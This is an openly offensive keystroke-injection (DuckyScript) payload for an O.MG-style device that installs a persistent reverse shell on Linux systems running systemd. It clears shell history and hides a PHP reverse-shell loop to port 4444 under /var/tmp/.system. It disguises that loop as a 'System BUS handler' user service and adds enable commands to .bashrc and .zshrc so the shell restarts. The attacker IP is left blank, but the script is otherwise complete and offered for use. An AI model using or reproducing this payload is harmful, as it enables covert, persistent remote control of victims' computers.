REM Title: persistentReverseOMG REM Description: persistentReverseOMG provides you persistent reverse shell remotely/locally. REM AUTHOR: drapl0n REM Version: 1.0 REM Category: Remote Access REM Target: Unix-like operating systems with systemd REM NOTE: Replace IP address( and port number(4444) with your servers IP address and Port Number. DELAY 2000 CTRL ALT t ENTER DELAY 4000 STRING bash ENTER DELAY 400 STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE ENTER DELAY 100 STRING mkdir /var/tmp/.system ENTER DELAY 100 STRING echo -e "while :\ndo\n\tping -c 5\n\tif [ \$? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"\",4444);exec("\"/bin/sh -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus ENTER DELAY 100 STRING chmod +x /var/tmp/.system/systemBus ENTER DELAY 100 REM [creating non-root systemd service] STRING mkdir -p ~/.config/systemd/user ENTER DELAY 100 STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\" > ~/.config/systemd/user/systemBUS.service ENTER DELAY 100 REM [enabling service] DELAY 200 STRING systemctl --user daemon-reload ENTER DELAY 200 STRING systemctl --user enable --now systemBUS.service ENTER DELAY 200 STRING systemctl --user start --now systemBUS.service ENTER DELAY 100 REM [autostarting service on terminal/shell launch] STRING echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.bashrc\nfi\n\n" > ~/tmmmp ENTER DELAY 50 STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit ENTER